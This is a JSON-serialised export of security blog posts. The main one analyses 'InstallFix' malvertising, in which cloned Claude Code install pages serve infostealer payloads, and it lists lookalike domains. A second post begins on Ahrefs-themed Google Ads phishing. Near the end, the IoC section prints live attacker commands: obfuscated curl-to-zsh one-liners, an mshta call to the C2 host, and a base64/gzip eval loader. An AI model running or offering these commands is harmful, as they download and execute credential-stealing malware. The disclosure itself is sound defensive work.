accounts",[7715],{"type":1372},{},{"nodeType":1257,"value":7718,"marks":7719,"data":7720}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":1258,"data":7722,"content":7723},{},[7724,7729],{"nodeType":1257,"value":7725,"marks":7726,"data":7728},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[7727],{"type":1318},{},{"nodeType":1257,"value":7730,"marks":7731,"data":7732},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":1258,"data":7734,"content":7735},{},[7736],{"nodeType":1257,"value":7737,"marks":7738,"data":7739},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":1335,"data":7741,"content":7745},{"target":7742},{"sys":7743},{"id":7744,"type":1340,"linkType":1341},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":1468,"data":7747,"content":7748},{},[7749],{"nodeType":1257,"value":7750,"marks":7751,"data":7752},"The payload",[],{},{"nodeType":1258,"data":7754,"content":7755},{},[7756],{"nodeType":1257,"value":7757,"marks":7758,"data":7759},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":1884,"data":7761,"content":7762},{},[7763,7773,7783],{"nodeType":1888,"data":7764,"content":7765},{},[7766],{"nodeType":1258,"data":7767,"content":7768},{},[7769],{"nodeType":1257,"value":7770,"marks":7771,"data":7772},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":1888,"data":7774,"content":7775},{},[7776],{"nodeType":1258,"data":7777,"content":7778},{},[7779],{"nodeType":1257,"value":7780,"marks":7781,"data":7782},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":1888,"data":7784,"content":7785},{},[7786],{"nodeType":1258,"data":7787,"content":7788},{},[7789],{"nodeType":1257,"value":7790,"marks":7791,"data":7792},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":1258,"data":7794,"content":7795},{},[7796],{"nodeType":1257,"value":7797,"marks":7798,"data":7799},"The MacOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":1258,"data":7801,"content":7802},{},[7803],{"nodeType":1257,"value":7804,"marks":7805,"data":7807},"You can see the full list of IoCs at the end of the blog.   ",[7806],{"type":1318},{},{"nodeType":1258,"data":7809,"content":7810},{},[7811],{"nodeType":1257,"value":7812,"marks":7813,"data":7814},"Our analysis shows us that the payload matches the Yara signatures for the Amatera Stealer malware, retrieved from the command-and-control domain claude[.]update-version[.]com.",[],{},{"nodeType":1335,"data":7816,"content":7820},{"target":7817},{"sys":7818},{"id":7819,"type":1340,"linkType":1341},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":1258,"data":7822,"content":7823},{},[7824],{"nodeType":1257,"value":7825,"marks":7826,"data":7827},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":1335,"data":7829,"content":7833},{"target":7830},{"sys":7831},{"id":7832,"type":1340,"linkType":1341},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":1468,"data":7835,"content":7836},{},[7837],{"nodeType":1257,"value":7838,"marks":7839,"data":7840},"Abusing legitimate hosting services",[],{},{"nodeType":1258,"data":7842,"content":7843},{},[7844,7848,7856],{"nodeType":1257,"value":7845,"marks":7846,"data":7847},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":1364,"data":7849,"content":7850},{"uri":2681},[7851],{"nodeType":1257,"value":7852,"marks":7853,"data":7855},"detection evasion technique",[7854],{"type":1372},{},{"nodeType":1257,"value":6166,"marks":7857,"data":7858},[],{},{"nodeType":1258,"data":7860,"content":7861},{},[7862],{"nodeType":1257,"value":7863,"marks":7864,"data":7865},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",[],{},{"nodeType":1307,"data":7867,"content":7868},{},[],{"nodeType":1311,"data":7870,"content":7871},{},[7872],{"nodeType":1257,"value":7873,"marks":7874,"data":7876},"A broader trend",[7875],{"type":1318},{},{"nodeType":1258,"data":7878,"content":7879},{},[7880],{"nodeType":1257,"value":7881,"marks":7882,"data":7883},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":1884,"data":7885,"content":7886},{},[7887,7910,7933,7956],{"nodeType":1888,"data":7888,"content":7889},{},[7890],{"nodeType":1258,"data":7891,"content":7892},{},[7893,7896,7906],{"nodeType":1257,"value":31,"marks":7894,"data":7895},[],{},{"nodeType":1364,"data":7897,"content":7899},{"uri":7898},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[7900],{"nodeType":1257,"value":7901,"marks":7902,"data":7905},"Fake Claude artifacts used in traditional ClickFix lures",[7903,7904],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7907,"marks":7908,"data":7909},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":1888,"data":7911,"content":7912},{},[7913],{"nodeType":1258,"data":7914,"content":7915},{},[7916,7919,7929],{"nodeType":1257,"value":31,"marks":7917,"data":7918},[],{},{"nodeType":1364,"data":7920,"content":7922},{"uri":7921},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[7923],{"nodeType":1257,"value":7924,"marks":7925,"data":7928},"Fake Homebrew installation pages",[7926,7927],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7930,"marks":7931,"data":7932},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":1888,"data":7934,"content":7935},{},[7936],{"nodeType":1258,"data":7937,"content":7938},{},[7939,7942,7952],{"nodeType":1257,"value":31,"marks":7940,"data":7941},[],{},{"nodeType":1364,"data":7943,"content":7945},{"uri":7944},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[7946],{"nodeType":1257,"value":7947,"marks":7948,"data":7951},"Fake OpenClaw installers on GitHub",[7949,7950],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7953,"marks":7954,"data":7955},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":1888,"data":7957,"content":7958},{},[7959],{"nodeType":1258,"data":7960,"content":7961},{},[7962,7965,7975],{"nodeType":1257,"value":31,"marks":7963,"data":7964},[],{},{"nodeType":1364,"data":7966,"content":7968},{"uri":7967},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[7969],{"nodeType":1257,"value":7970,"marks":7971,"data":7974},"Trojanised npm packages",[7972,7973],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7976,"marks":7977,"data":7978},": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":1258,"data":7980,"content":7981},{},[7982],{"nodeType":1257,"value":7983,"marks":7984,"data":7985},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",[],{},{"nodeType":1335,"data":7987,"content":7991},{"target":7988},{"sys":7989},{"id":7990,"type":1340,"linkType":1341},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":1307,"data":7993,"content":7994},{},[],{"nodeType":1468,"data":7996,"content":7997},{},[7998],{"nodeType":1257,"value":7999,"marks":8000,"data":8002},"How Push detects InstallFix",[8001],{"type":1318},{},{"nodeType":1258,"data":8004,"content":8005},{},[8006],{"nodeType":1257,"value":8007,"marks":8008,"data":8009},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":1258,"data":8011,"content":8012},{},[8013],{"nodeType":1257,"value":8014,"marks":8015,"data":8016},"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":1258,"data":8018,"content":8019},{},[8020],{"nodeType":1257,"value":8021,"marks":8022,"data":8023},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":1258,"data":8025,"content":8026},{},[8027,8031,8038,8041,8048,8051,8058],{"nodeType":1257,"value":8028,"marks":8029,"data":8030},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":1364,"data":8032,"content":8033},{"uri":2228},[8034],{"nodeType":1257,"value":2231,"marks":8035,"data":8037},[8036],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":8039,"data":8040},[],{},{"nodeType":1364,"data":8042,"content":8043},{"uri":3737},[8044],{"nodeType":1257,"value":3740,"marks":8045,"data":8047},[8046],{"type":1372},{},{"nodeType":1257,"value":3744,"marks":8049,"data":8050},[],{},{"nodeType":1364,"data":8052,"content":8053},{"uri":2241},[8054],{"nodeType":1257,"value":2244,"marks":8055,"data":8057},[8056],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":8059,"data":8060},[],{},{"nodeType":1307,"data":8062,"content":8063},{},[],{"nodeType":1311,"data":8065,"content":8066},{},[8067],{"nodeType":1257,"value":2933,"marks":8068,"data":8070},[8069],{"type":1318},{},{"nodeType":1258,"data":8072,"content":8073},{},[8074,8078,8085],{"nodeType":1257,"value":8075,"marks":8076,"data":8077},"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":1364,"data":8079,"content":8080},{"uri":2946},[8081],{"nodeType":1257,"value":2949,"marks":8082,"data":8084},[8083],{"type":1372},{},{"nodeType":1257,"value":8086,"marks":8087,"data":8088}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":1258,"data":8090,"content":8091},{},[8092],{"nodeType":1257,"value":8093,"marks":8094,"data":8095},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":1258,"data":8097,"content":8098},{},[8099],{"nodeType":1257,"value":8100,"marks":8101,"data":8103},"Cloned domains:",[8102],{"type":1318},{},{"nodeType":1884,"data":8105,"content":8106},{},[8107,8117,8127,8137,8147,8157,8166,8176,8186,8195,8205,8215,8225,8235,8245,8255,8265,8274,8284,8294,8304],{"nodeType":1888,"data":8108,"content":8109},{},[8110],{"nodeType":1258,"data":8111,"content":8112},{},[8113],{"nodeType":1257,"value":8114,"marks":8115,"data":8116},"claud-code[.]pages[.]dev",[],{},{"nodeType":1888,"data":8118,"content":8119},{},[8120],{"nodeType":1258,"data":8121,"content":8122},{},[8123],{"nodeType":1257,"value":8124,"marks":8125,"data":8126},"claulastver[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8128,"content":8129},{},[8130],{"nodeType":1258,"data":8131,"content":8132},{},[8133],{"nodeType":1257,"value":8134,"marks":8135,"data":8136},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8138,"content":8139},{},[8140],{"nodeType":1258,"data":8141,"content":8142},{},[8143],{"nodeType":1257,"value":8144,"marks":8145,"data":8146},"hgjbulk.pages[.]dev",[],{},{"nodeType":1888,"data":8148,"content":8149},{},[8150],{"nodeType":1258,"data":8151,"content":8152},{},[8153],{"nodeType":1257,"value":8154,"marks":8155,"data":8156},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":1888,"data":8158,"content":8159},{},[8160],{"nodeType":1258,"data":8161,"content":8162},{},[8163],{"nodeType":1257,"value":8144,"marks":8164,"data":8165},[],{},{"nodeType":1888,"data":8167,"content":8168},{},[8169],{"nodeType":1258,"data":8170,"content":8171},{},[8172],{"nodeType":1257,"value":8173,"marks":8174,"data":8175},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8177,"content":8178},{},[8179],{"nodeType":1258,"data":8180,"content":8181},{},[8182],{"nodeType":1257,"value":8183,"marks":8184,"data":8185},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":1888,"data":8187,"content":8188},{},[8189],{"nodeType":1258,"data":8190,"content":8191},{},[8192],{"nodeType":1257,"value":8124,"marks":8193,"data":8194},[],{},{"nodeType":1888,"data":8196,"content":8197},{},[8198],{"nodeType":1258,"data":8199,"content":8200},{},[8201],{"nodeType":1257,"value":8202,"marks":8203,"data":8204},"cladueall[.]pages[.]dev",[],{},{"nodeType":1888,"data":8206,"content":8207},{},[8208],{"nodeType":1258,"data":8209,"content":8210},{},[8211],{"nodeType":1257,"value":8212,"marks":8213,"data":8214},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":1888,"data":8216,"content":8217},{},[8218],{"nodeType":1258,"data":8219,"content":8220},{},[8221],{"nodeType":1257,"value":8222,"marks":8223,"data":8224},"myclauda[.]it[.]com",[],{},{"nodeType":1888,"data":8226,"content":8227},{},[8228],{"nodeType":1258,"data":8229,"content":8230},{},[8231],{"nodeType":1257,"value":8232,"marks":8233,"data":8234},"vdsafsaf[.]it[.]com",[],{},{"nodeType":1888,"data":8236,"content":8237},{},[8238],{"nodeType":1258,"data":8239,"content":8240},{},[8241],{"nodeType":1257,"value":8242,"marks":8243,"data":8244},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":1888,"data":8246,"content":8247},{},[8248],{"nodeType":1258,"data":8249,"content":8250},{},[8251],{"nodeType":1257,"value":8252,"marks":8253,"data":8254},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":1888,"data":8256,"content":8257},{},[8258],{"nodeType":1258,"data":8259,"content":8260},{},[8261],{"nodeType":1257,"value":8262,"marks":8263,"data":8264},"claude-code-macos[.]com",[],{},{"nodeType":1888,"data":8266,"content":8267},{},[8268],{"nodeType":1258,"data":8269,"content":8270},{},[8271],{"nodeType":1257,"value":8183,"marks":8272,"data":8273},[],{},{"nodeType":1888,"data":8275,"content":8276},{},[8277],{"nodeType":1258,"data":8278,"content":8279},{},[8280],{"nodeType":1257,"value":8281,"marks":8282,"data":8283},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8285,"content":8286},{},[8287],{"nodeType":1258,"data":8288,"content":8289},{},[8290],{"nodeType":1257,"value":8291,"marks":8292,"data":8293},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8295,"content":8296},{},[8297],{"nodeType":1258,"data":8298,"content":8299},{},[8300],{"nodeType":1257,"value":8301,"marks":8302,"data":8303},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8305,"content":8306},{},[8307],{"nodeType":1258,"data":8308,"content":8309},{},[8310],{"nodeType":1257,"value":8311,"marks":8312,"data":8313},"notklmalans[.]pages[.]dev",[],{},{"nodeType":1258,"data":8315,"content":8316},{},[8317],{"nodeType":1257,"value":8318,"marks":8319,"data":8321},"Domains hosting malicious payload:",[8320],{"type":1318},{},{"nodeType":1884,"data":8323,"content":8324},{},[8325,8335,8345],{"nodeType":1888,"data":8326,"content":8327},{},[8328],{"nodeType":1258,"data":8329,"content":8330},{},[8331],{"nodeType":1257,"value":8332,"marks":8333,"data":8334},"contatoplus[.]com",[],{},{"nodeType":1888,"data":8336,"content":8337},{},[8338],{"nodeType":1258,"data":8339,"content":8340},{},[8341],{"nodeType":1257,"value":8342,"marks":8343,"data":8344},"sarahmoftah[.]com",[],{},{"nodeType":1888,"data":8346,"content":8347},{},[8348],{"nodeType":1258,"data":8349,"content":8350},{},[8351],{"nodeType":1257,"value":8352,"marks":8353,"data":8354},"claude[.]update-version[.]com",[],{},{"nodeType":1258,"data":8356,"content":8357},{},[8358],{"nodeType":1257,"value":8359,"marks":8360,"data":8362},"Commands:",[8361],{"type":1318},{},{"nodeType":1258,"data":8364,"content":8365},{},[8366],{"nodeType":1257,"value":8367,"marks":8368,"data":8371},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[8369],{"type":8370},"code",{},{"nodeType":1258,"data":8373,"content":8374},{},[8375],{"nodeType":1257,"value":31,"marks":8376,"data":8377},[],{},{"nodeType":1258,"data":8379,"content":8380},{},[8381],{"nodeType":1257,"value":8382,"marks":8383,"data":8385},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[8384],{"type":8370},{},{"nodeType":1258,"data":8387,"content":8388},{},[8389],{"nodeType":1257,"value":8390,"marks":8391,"data":8392},"\n",[],{},{"nodeType":1258,"data":8394,"content":8395},{},[8396],{"nodeType":1257,"value":8397,"marks":8398,"data":8400},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude ",[8399],{"type":8370},{},{"nodeType":1258,"data":8402,"content":8403},{},[8404,8407],{"nodeType":1257,"value":8390,"marks":8405,"data":8406},[],{},{"nodeType":1257,"value":8408,"marks":8409,"data":8411},"Base64 decoded url:",[8410],{"type":1318},{},{"nodeType":1258,"data":8413,"content":8414},{},[8415],{"nodeType":1257,"value":8416,"marks":8417,"data":8419},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[8418],{"type":8370},{},{"nodeType":1258,"data":8421,"content":8422},{},[8423],{"nodeType":1257,"value":31,"marks":8424,"data":8425},[],{},{"nodeType":1258,"data":8427,"content":8428},{},[8429],{"nodeType":1257,"value":8430,"marks":8431,"data":8433},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[8432],{"type":8370},{},{"nodeType":1258,"data":8435,"content":8436},{},[8437,8440],{"nodeType":1257,"value":8390,"marks":8438,"data":8439},[],{},{"nodeType":1257,"value":8441,"marks":8442,"data":8444},"Second stage:",[8443],{"type":1318},{},{"nodeType":1258,"data":8446,"content":8447},{},[8448],{"nodeType":1257,"value":8449,"marks":8450,"data":8452},"#!/bin/zsh",[8451],{"type":8370},{},{"nodeType":1258,"data":8454,"content":8455},{},[8456],{"nodeType":1257,"value":8457,"marks":8458,"data":8460},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",[8459],{"type":8370},{},{"nodeType":1258,"data":8462,"content":8463},{},[8464],{"nodeType":1257,"value":8465,"marks":8466,"data":8468},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[8467],{"type":8370},{},{"nodeType":1258,"data":8470,"content":8471},{},[8472],{"nodeType":1257,"value":8473,"marks":8474,"data":8476},"PAYLOAD_END",[8475],{"type":8370},{},{"nodeType":1258,"data":8478,"content":8479},{},[8480],{"nodeType":1257,"value":2032,"marks":8481,"data":8483},[8482],{"type":8370},{},{"nodeType":1258,"data":8485,"content":8486},{},[8487],{"nodeType":1257,"value":8488,"marks":8489,"data":8491},"eval \"$mkgrc9\"",[8490],{"type":8370},{},{"nodeType":1258,"data":8493,"content":8494},{},[8495,8498],{"nodeType":1257,"value":8390,"marks":8496,"data":8497},[],{},{"nodeType":1257,"value":8499,"marks":8500,"data":8502},"Binaries:",[8501],{"type":1318},{},{"nodeType":1258,"data":8504,"content":8505},{},[8506],{"nodeType":1257,"value":8449,"marks":8507,"data":8509},[8508],{"type":8370},{},{"nodeType":1258,"data":8511,"content":8512},{},[8513],{"nodeType":1257,"value":8514,"marks":8515,"data":8517},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[8516],{"type":8370},{},"InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":8523},[8524,8526],{"sys":8525,"name":1270},{"id":1269},{"sys":8527,"name":1274},{"id":1273},{"items":8529},[8530],{"fullName":8531,"firstName":8532,"jobTitle":8533,"profilePicture":8534},"Jacques Louw","Jacques","Co-founder / CRO",{"url":8535},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":1278,"sys":8537,"content":8539,"title":9139,"synopsis":9140,"hashTags":118,"publishedDate":9141,"slug":9142,"tagsCollection":9143,"authorsCollection":9149},{"id":8538},"2YmiesBvJHGw4wiKEKzLUq",{"json":8540},{"nodeType":1259,"data":8541,"content":8542},{},[8543,8550,8557,8606,8612,8619,8626,8632,8638,8644,8647,8655,8662,8668,8675,8681,8687,8694,8700,8717,8720,8728,8735,8742,8749,8756,8762,8780,8783,8791,8798,8854,8861,8868,8871,8878,8885,8892,8899,8925,8928,8935,8951,8958,9001,9008,9051,9058,9131],{"nodeType":1258,"data":8544,"content":8545},{},[8546],{"nodeType":1257,"value":8547,"marks":8548,"data":8549},"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks ultimately serve up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",[],{},{"nodeType":1258,"data":8551,"content":8552},{},[8553],{"nodeType":1257,"value":8554,"marks":8555,"data":8556},"Most recently, we reported on:",[],{},{"nodeType":1884,"data":8558,"content":8559},{},[8560,8583],{"nodeType":1888,"data":8561,"content":8562},{},[8563],{"nodeType":1258,"data":8564,"content":8565},{},[8566,8570,8579],{"nodeType":1257,"value":8567,"marks":8568,"data":8569},"A campaign running ",[],{},{"nodeType":1364,"data":8571,"content":8573},{"uri":8572},"https://pushsecurity.com/blog/analysing-a-malvertising-attack-targeting-business-google-accounts/",[8574],{"nodeType":1257,"value":8575,"marks":8576,"data":8578},"fake malvertising ads for “Google Ads”",[8577],{"type":1372},{},{"nodeType":1257,"value":8580,"marks":8581,"data":8582}," in Google Search. ",[],{},{"nodeType":1888,"data":8584,"content":8585},{},[8586],{"nodeType":1258,"data":8587,"content":8588},{},[8589,8593,8602],{"nodeType":1257,"value":8590,"marks":8591,"data":8592},"A campaign using sophisticated ",[],{},{"nodeType":1364,"data":8594,"content":8596},{"uri":8595},"https://pushsecurity.com/blog/uncovering-a-calendly-themed-phishing-campaign/",[8597],{"nodeType":1257,"value":8598,"marks":8599,"data":8601},"Calendly-themed phishing lures",[8600],{"type":1372},{},{"nodeType":1257,"value":8603,"marks":8604,"data":8605}," targeting marketing professionals.",[],{},{"nodeType":1335,"data":8607,"content":8611},{"target":8608},{"sys":8609},{"id":8610,"type":1340,"linkType":1341},"1ThnhFZQIhzV179qclvzFH",[],{"nodeType":1258,"data":8613,"content":8614},{},[8615],{"nodeType":1257,"value":8616,"marks":8617,"data":8618},"Now, we’ve seen the Google Ads malvertising campaign expand to run additional ads impersonating Ahrefs, an AI marketing platform. Crucially, employees with access to Ahrefs are highly likely to also have access to Google Ads, meaning that attackers can reliably target Google accounts via Ahrefs. ",[],{},{"nodeType":1258,"data":8620,"content":8621},{},[8622],{"nodeType":1257,"value":8623,"marks":8624,"data":8625},"You can see a demo of the phishing chain below. ",[],{},{"nodeType":1335,"data":8627,"content":8631},{"target":8628},{"sys":8629},{"id":8630,"type":1340,"linkType":1341},"2XjyySGldgl9uPA7CZRms8",[],{"nodeType":1335,"data":8633,"content":8637},{"target":8634},{"sys":8635},{"id":8636,"type":1340,"linkType":1341},"yB12nGF91iq15GoHWItaX",[],{"nodeType":1335,"data":8639,"content":8643},{"target":8640},{"sys":8641},{"id":8642,"type":1340,"linkType":1341},"2NK29DaTd93kOctyWxV0RT",[],{"nodeType":1307,"data":8645,"content":8646},{},[],{"nodeType":1311,"data":8648,"content":8649},{},[8650],{"nodeType":1257,"value":8651,"marks":8652,"data":8654},"Attack breakdown",[8653],{"type":1318},{},{"nodeType":1258,"data":8656,"content":8657},{},[8658],{"nodeType":1257,"value":8659,"marks":8660,"data":8661},"Users searching for “ahrefs” on Google Search were served with a fake ad impersonating Ahrefs, hosted on Squarespace, a legitimate website building and hosting platform. Previously, we’d seen this campaign use hosting sites Odoo and Kartra to similar effect. ",[],{},{"nodeType":1335,"data":8663,"content":8667},{"target":8664},{"sys":8665},{"id":8666,"type":1340,"linkType":1341},"59dhFey5rahm5sA20NudTl",[],{"nodeType":1258,"data":8669,"content":8670},{},[8671],{"nodeType":1257,"value":8672,"marks":8673,"data":8674},"Upon clicking the link, the victim was taken to a clone of the real Ahrefs site. Crucially, you can see that the domain is not the official Ahrefs domain. ",[],{},{"nodeType":1335,"data":8676,"content":8680},{"target":8677},{"sys":8678},{"id":8679,"type":1340,"linkType":1341},"48fQUiJXC1qACKUUPDliS5",[],{"nodeType":1335,"data":8682,"content":8686},{"target":8683},{"sys":8684},{"id":8685,"type":1340,"linkType":1341},"77iqOW1jDVt5Oxw8qTwnKG",[],{"nodeType":1258,"data":8688,"content":8689},{},[8690],{"nodeType":1257,"value":8691,"marks":8692,"data":8693},"However, the site is not fully interactable beyond the front page. Clicking on any link takes the user to a Google sign-in page. ",[],{},{"nodeType":1335,"data":8695,"content":8699},{"target":8696},{"sys":8697},{"id":8698,"type":1340,"linkType":1341},"7t9BoUyIFN8dlBDksjsYlD",[],{"nodeType":1258,"data":8701,"content":8702},{},[8703,8707,8714],{"nodeType":1257,"value":8704,"marks":8705,"data":8706},"This is in fact an AITM phishing page that is designed to hijack the victim’s Google account. Entering credentials and completing the MFA check will result in the attacker stealing the app session and effectively taking over the account. The phishing kit used matches ",[],{},{"nodeType":1364,"data":8708,"content":8709},{"uri":8572},[8710],{"nodeType":1257,"value":8711,"marks":8712,"data":8713},"the previous malvertising detected impersonating Google Ads",[],{},{"nodeType":1257,"value":6166,"marks":8715,"data":8716},[],{},{"nodeType":1307,"data":8718,"content":8719},{},[],{"nodeType":1311,"data":8721,"content":8722},{},[8723],{"nodeType":1257,"value":8724,"marks":8725,"data":8727},"Why are attackers targeting ad manager accounts?",[8726],{"type":1318},{},{"nodeType":1258,"data":8729,"content":8730},{},[8731],{"nodeType":1257,"value":8732,"marks":8733,"data":8734},"Ad Manager accounts on platforms like Google, Facebook, and LinkedIn have become lucrative targets for cybercriminals. By compromising these accounts, attackers can exploit the digital advertising ecosystem in various ways for financial gain. ",[],{},{"nodeType":1258,"data":8736,"content":8737},{},[8738],{"nodeType":1257,"value":8739,"marks":8740,"data":8741},"The ad industry’s scale makes it attractive to fraud. Estimates suggest digital ad fraud cost advertisers tens of billions, potentially nearing $100 billion or more, with projections reaching $172 billion by 2028.",[],{},{"nodeType":1258,"data":8743,"content":8744},{},[8745],{"nodeType":1257,"value":8746,"marks":8747,"data":8748},"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized illicitly. The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",[],{},{"nodeType":1258,"data":8750,"content":8751},{},[8752],{"nodeType":1257,"value":8753,"marks":8754,"data":8755},"Pretty much every enterprise today advertises their services via Google ads — this makes attacks on these accounts pretty much a unanimous problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the customer portfolio. ",[],{},{"nodeType":1335,"data":8757,"content":8761},{"target":8758},{"sys":8759},{"id":8760,"type":1340,"linkType":1341},"1WPbstxHtdjnAKpF1rhCpW",[],{"nodeType":1258,"data":8763,"content":8764},{},[8765,8769,8777],{"nodeType":1257,"value":8766,"marks":8767,"data":8768},"Learn more about why attackers are targeting ad manager accounts ",[],{},{"nodeType":1364,"data":8770,"content":8772},{"uri":8771},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis",[8773],{"nodeType":1257,"value":8774,"marks":8775,"data":8776},"in our blog post",[],{},{"nodeType":1257,"value":6166,"marks":8778,"data":8779},[],{},{"nodeType":1307,"data":8781,"content":8782},{},[],{"nodeType":1311,"data":8784,"content":8785},{},[8786],{"nodeType":1257,"value":8787,"marks":8788,"data":8790},"Why malvertising? ",[8789],{"type":1318},{},{"nodeType":1258,"data":8792,"content":8793},{},[8794],{"nodeType":1257,"value":8795,"marks":8796,"data":8797},"Malvertising scams happen across lots of different sites, but the most common platform we see targeted is Google Search. This takes advantage of users browsing to find a website and clicking the first link that appears — in this case a fake sponsored link taking you to the attacker’s page. 